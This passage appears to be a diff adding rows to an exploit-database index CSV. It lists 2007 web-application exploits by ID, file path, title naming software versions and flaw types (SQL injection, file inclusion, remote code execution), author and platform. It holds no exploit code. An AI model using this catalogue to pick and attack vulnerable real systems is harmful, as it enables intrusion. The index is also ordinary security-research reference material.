Inclusion",2007-09-19,BiNgZa,webapps,php, +4433,exploits/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' SQL Injection",2007-09-19,str0ke,webapps,php, +4434,exploits/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,webapps,php, +4435,exploits/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation",2007-09-20,undefined1_,webapps,php, +4436,exploits/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,webapps,php, +4439,exploits/php/webapps/4439.txt,"neuron news 1.0 - 'index.php?q' Local File Inclusion",2007-09-21,Dj7xpl,webapps,php, +4440,exploits/php/webapps/4440.txt,"Joomla! Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,webapps,php, +4441,exploits/php/webapps/4441.txt,"iziContents rc6 - Local/Remote File Inclusion",2007-09-21,irk4z,webapps,php, +4442,exploits/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,webapps,php, +4443,exploits/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,webapps,php, +4444,exploits/php/webapps/4444.txt,"Black Lily 2007 - 'products.php?class' SQL Injection",2007-09-22,VerY-SecReT,webapps,php, +4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",2007-09-23,ShockShadow,webapps,php, +4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",webapps,php, +4448,exploits/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",2007-09-23,GoLd_M,webapps,php, +4449,exploits/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,webapps,php, +4451,exploits/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",2007-09-24,BiNgZa,webapps,php, +4454,exploits/php/webapps/4454.txt,"sk.log 0.5.3 - 'skin_url' Remote File Inclusion",2007-09-24,w0cker,webapps,php, +4456,exploits/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,webapps,php, +4457,exploits/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",webapps,php, +4458,exploits/asp/webapps/4458.txt,"Novus 1.0 - 'notas.asp?nota_id' SQL Injection",2007-09-26,ka0x,webapps,asp, +4459,exploits/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,webapps,php, +4461,exploits/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php?view' Remote File Inclusion",2007-09-27,GoLd_M,webapps,php, +4462,exploits/php/webapps/4462.txt,"Chupix CMS 0.2.3 - 'repertoire' Remote File Inclusion",2007-09-27,0in,webapps,php, +4463,exploits/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",webapps,php, +4464,exploits/php/webapps/4464.txt,"PhFiTo 1.3.0 - 'SRC_PATH' Remote File Inclusion",2007-09-28,w0cker,webapps,php, +4465,exploits/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,webapps,php, +4466,exploits/php/webapps/4466.php,"Zomplog 3.8.1 - Arbitrary File Upload",2007-09-28,InATeam,webapps,php, +4467,exploits/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,webapps,php, +4469,exploits/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,webapps,php, +4470,exploits/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,webapps,php, +4471,exploits/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion",2007-09-30,"Mehmet Ince",webapps,php, +4472,exploits/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,webapps,php, +4473,exploits/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,webapps,php, +4475,exploits/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,webapps,php, +4476,exploits/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,webapps,php, +4477,exploits/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusions",2007-10-01,kezzap66345,webapps,php, +4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,webapps,php, +4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php, +4482,exploits/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,webapps,php, +4483,exploits/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - 'footer.php' Remote File Inclusion",2007-10-04,"Nice Name Crew",webapps,php, +4485,exploits/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,webapps,php, +4486,exploits/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,webapps,asp, +4489,exploits/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,webapps,php, +4490,exploits/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",webapps,php, +4491,exploits/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",webapps,php, +4492,exploits/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php?path' Remote File Inclusion",2007-10-06,Mogatil,webapps,php, +4493,exploits/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,webapps,php, +4494,exploits/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,webapps,php, +4495,exploits/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",webapps,php, +4496,exploits/php/webapps/4496.txt,"Joomla! Component Flash Image Gallery - Remote File Inclusion",2007-10-07,"Mehmet Ince",webapps,php, +4497,exploits/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,webapps,php, +4499,exploits/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,webapps,php, +4500,exploits/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",webapps,php, +4501,exploits/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",2007-10-08,"[PHCN] Mahjong",webapps,php, +4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",webapps,php, +4503,exploits/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,webapps,php, +4504,exploits/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",webapps,php, +4505,exploits/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,webapps,php, +4507,exploits/php/webapps/4507.txt,"Joomla! Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,webapps,php, +4508,exploits/php/webapps/4508.txt,"Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusions",2007-10-10,NoGe,webapps,php, +4509,exploits/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,webapps,php, +4510,exploits/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash ation Vector",2007-10-10,ShAnKaR,webapps,php, +4511,exploits/php/webapps/4511.pl,"cpDynaLinks 1.02 - 'category.php' SQL Injection",2007-10-10,ka0x,webapps,php, +4512,exploits/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,webapps,php, +4513,exploits/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,webapps,php, +4518,exploits/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php, +4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php, +4520,exploits/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,webapps,php, +4521,exploits/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,webapps,php, +4523,exploits/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,webapps,php, +4524,exploits/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",webapps,php, +4525,exploits/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,webapps,php, +4527,exploits/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",webapps,php, +4528,exploits/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",webapps,php, +4529,exploits/cgi/webapps/4529.txt,"WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,webapps,cgi, +4536,exploits/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,webapps,php, +4538,exploits/php/webapps/4538.txt,"Artmedic CMS 3.4 - 'index.php' Local File Inclusion",2007-10-16,iNs,webapps,php, +4539,exploits/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,webapps,php, +4543,exploits/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,webapps,php, +4544,exploits/php/webapps/4544.txt,"LimeSurvey 1.52 - 'language.php' Remote File Inclusion",2007-10-17,S.W.A.T.,webapps,php, +4545,exploits/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusions",2007-10-18,S.W.A.T.,webapps,php, +4546,exploits/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,webapps,php, +4547,exploits/php/webapps/4547.pl,"Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",webapps,php, +4548,exploits/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,webapps,php, +4549,exploits/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions",2007-10-21,GoLd_M,webapps,php, +4550,exploits/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,webapps,php, +4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,webapps,php, +4554,exploits/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",2007-10-22,BiNgZa,webapps,php, +4555,exploits/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",2007-10-22,GoLd_M,webapps,php, +4557,exploits/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,webapps,php, +4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",2007-10-22,"BorN To K!LL",webapps,php, +4561,exploits/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,webapps,php, +4562,exploits/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,webapps,php, +4563,exploits/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",2007-10-23,BiNgZa,webapps,php, +4565,exploits/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusions",2007-10-23,Civi,webapps,php, +4568,exploits/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,webapps,php, +4575,exploits/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2007-10-27,GoLd_M,webapps,php, +4576,exploits/php/webapps/4576.txt,"JobSite Professional 2.0 - 'file.php' SQL Injection",2007-10-28,ZynbER,webapps,php, +4577,exploits/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,webapps,php, +4578,exploits/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,webapps,asp, +4580,exploits/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,webapps,php, +4581,exploits/php/webapps/4581.txt,"Sige 0.1 - 'sige_init.php' Remote File Inclusion",2007-10-28,GoLd_M,webapps,php, +4582,exploits/php/webapps/4582.txt,"teatro 1.6 - 'basePath' Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",webapps,php, +4585,exploits/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,webapps,php, +4586,exploits/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,webapps,php, +4587,exploits/php/webapps/4587.txt,"MiniBB 2.1 - 'table' SQL Injection",2007-10-30,irk4z,webapps,php, +4588,exploits/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - 'dir_ws' Remote File Inclusion",2007-10-30,BiNgZa,webapps,php, +4589,exploits/php/webapps/4589.html,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,webapps,php, +4591,exploits/php/webapps/4591.txt,"ModuleBuilder 1.0 - 'file' Remote File Disclosure",2007-10-31,GoLd_M,webapps,php, +4592,exploits/php/webapps/4592.txt,"ISPworker 1.21 - 'download.php' Remote File Disclosure",2007-10-31,GoLd_M,webapps,php, +4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,webapps,php, +4595,exploits/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,webapps,php, +4596,exploits/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,webapps,php, +4597,exploits/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusions",2007-11-02,GoLd_M,webapps,php, +4599,exploits/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,webapps,php, +4602,exploits/php/webapps/4602.txt,"GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion",2007-11-03,irk4z,webapps,php, +4603,exploits/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,webapps,php, +4604,exploits/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion",2007-11-03,GoLd_M,webapps,php, +4605,exploits/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,webapps,php, +4606,exploits/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Remote File Inclusion",2007-11-04,GoLd_M,webapps,php, +4607,exploits/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - 'cmsdir' Remote File Inclusion",2007-11-04,mdx,webapps,php, +4608,exploits/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,webapps,php, +4609,exploits/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,webapps,asp, +4611,exploits/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,webapps,php, +4614,exploits/php/webapps/4614.txt,"jPORTAL 2.3.1 - 'articles.php' SQL Injection",2007-11-09,Alexsize,webapps,php, +4617,exploits/php/webapps/4617.txt,"Softbiz Auctions Script - 'product_desc.php' SQL Injection",2007-11-11,"Khashayar Fereidani",webapps,php, +4618,exploits/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",webapps,php, +4619,exploits/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",webapps,php, +4620,exploits/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",webapps,php, +4621,exploits/php/webapps/4621.txt,"patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion",2007-11-12,p4sswd,webapps,php, +4622,exploits/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,webapps,php, +4623,exploits/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,webapps,php, +4626,exploits/php/webapps/4626.txt,"Joomla! Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,webapps,php, +4627,exploits/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,webapps,php, +4628,exploits/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,webapps,php, +4629,exploits/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,webapps,php, +4630,exploits/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Remote File Inclusion",2007-11-17,ShAy6oOoN,webapps,php, +4631,exploits/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",webapps,php, +4632,exploits/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,webapps,php, +4633,exploits/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,webapps,php, +4634,exploits/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details",2007-11-18,Gu1ll4um3r0m41n,webapps,php, +4635,exploits/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection",2007-11-18,Liz0ziM,webapps,php, +4636,exploits/php/webapps/4636.txt,"Joomla! Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,webapps,php, +4637,exploits/php/webapps/4637.txt,"bcoos 1.0.10 - Local File Inclusion / SQL Injection",2007-11-20,BugReport.IR,webapps,php, +4638,exploits/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,webapps,php, +4639,exploits/php/webapps/4639.html,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,webapps,php, +4640,exploits/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusions",2007-11-21,NoGe,webapps,php, +4641,exploits/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections",2007-11-21,K-159,webapps,php, +4642,exploits/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,webapps,php, +4643,exploits/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,webapps,php, +4644,exploits/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - 'nsearch' SQL Injection",2007-11-22,"Aria-Security Team",webapps,asp, +4645,exploits/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php?cat' SQL Injection",2007-11-22,S.W.A.T.,webapps,php, +4646,exploits/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - 'article.php' SQL Injection",2007-11-22,Shadowleet,webapps,php, +4647,exploits/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",webapps,cgi, +4649,exploits/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",webapps,php, +4650,exploits/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - 'skin_file' Remote File Inclusion",2007-11-23,Crackers_Child,webapps,php, +4652,exploits/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php?id' Local File Inclusion",2007-11-24,Crackers_Child,webapps,php, +4653,exploits/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,webapps,php, +4654,exploits/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,webapps,php, +4655,exploits/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,webapps,php, +4656,exploits/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,webapps,php, +4658,exploits/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,webapps,php, +4659,exploits/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusions",2007-11-25,ShAy6oOoN,webapps,php, +4660,exploits/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",webapps,php, +4661,exploits/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,webapps,php, +4662,exploits/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,webapps,php, +4665,exploits/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL Injections",2007-11-27,KiNgOfThEwOrLd,webapps,php, +4666,exploits/php/webapps/4666.txt,"Eurologon CMS - 'files.php' Arbitrary File Download",2007-11-27,KiNgOfThEwOrLd,webapps,php, +4667,exploits/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure",2007-11-27,KiNgOfThEwOrLd,webapps,php, +4668,exploits/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,webapps,php, +4669,exploits/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php?act' Local File Inclusion",2007-11-27,tomplixsee,webapps,php, +4670,exploits/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,webapps,php, +4671,exploits/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusions",2007-11-28,MhZ91,webapps,php, +4672,exploits/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusions",2007-11-28,MhZ91,webapps,php, +4674,exploits/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,webapps,php, +4675,exploits/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - 'filepath' Remote File Disclosure",2007-11-28,GoLd_M,webapps,php, +4676,exploits/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure",2007-11-29,Evil.Man,webapps,php, +4677,exploits/php/webapps/4677.txt,"WebED 0.0.9 - 'index.php' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php, +4678,exploits/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,webapps,php, +4679,exploits/php/webapps/4679.txt,"KML share 1.1 - 'region.php?layer' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php, +4680,exploits/php/webapps/4680.txt,"LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure",2007-11-29,GoLd_M,webapps,php, +4681,exploits/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,webapps,php, +4684,exploits/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusions",2007-12-01,ShAy6oOoN,webapps,php, +4685,exploits/php/webapps/4685.txt,"Rayzz Script 2.0 - Local/Remote File Inclusion",2007-12-01,Crackers_Child,webapps,php, +4686,exploits/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,webapps,php, +4687,exploits/asp/webapps/4687.html,"Snitz Forums 2000 - 'Active.asp' SQL Injection",2007-12-03,BugReport.IR,webapps,asp, +4691,exploits/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,webapps,php, +4693,exploits/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,webapps,php, +4694,exploits/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php?link' Remote File Disclosure",2007-12-05,p4imi0,webapps,php, +4695,exploits/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,webapps,php, +4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php, +4697,exploits/asp/webapps/4697.txt,"MWOpen E-Commerce - 'leggi_commenti.asp' SQL Injection",2007-12-06,KiNgOfThEwOrLd,webapps,asp, +4704,exploits/php/webapps/4704.txt,"PolDoc CMS 0.96 - 'download_file.php' File Disclosure",2007-12-08,GoLd_M,webapps,php, +4705,exploits/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,webapps,php, +4706,exploits/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,webapps,php, +4707,exploits/php/webapps/4707.txt,"Ace Image Hosting Script - 'id' SQL Injection",2007-12-09,t0pP8uZz,webapps,php, +4708,exploits/php/webapps/4708.txt,"DWdirectory 2.1 - SQL Injection",2007-12-09,t0pP8uZz,webapps,php, +4709,exploits/php/webapps/4709.txt,"SH-News 3.0 - 'comments.php' SQL Injection",2007-12-09,hadihadi,webapps,php, +4710,exploits/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",webapps,php, +4711,exploits/php/webapps/4711.txt,"Falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",webapps,php, +4712,exploits/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,webapps,php, +4714,exploits/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber",2007-12-10,v0l4arrra,webapps,php, +4718,exploits/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - 'deletekey()' Command Injection",2007-12-11,Backdoored,webapps,php, +4719,exploits/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php?template' Local File Inclusion",2007-12-11,MhZ91,webapps,php, +4721,exploits/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",webapps,php, +4722,exploits/php/webapps/4722.txt,"ViArt CMS/Shop/Helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,webapps,php, +4725,exploits/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,webapps,php, +4726,exploits/php/webapps/4726.txt,"CityWriter 0.9.7 - 'head.php' Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,webapps,php, +4727,exploits/php/webapps/4727.txt,"CMS Galaxie Software - 'category_id' SQL Injection",2007-12-13,MurderSkillz,webapps,php, +4728,exploits/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - 'id' Remote File Disclosure",2007-12-13,GoLd_M,webapps,php, +4729,exploits/php/webapps/4729.txt,"xml2owl 0.1.1 - 'filedownload.php' Remote File Disclosure",2007-12-13,GoLd_M,webapps,php, +4730,exploits/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,webapps,asp, +4731,exploits/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access",2007-12-13,Liz0ziM,webapps,php, +4733,exploits/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",webapps,php, +4734,exploits/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",webapps,php, 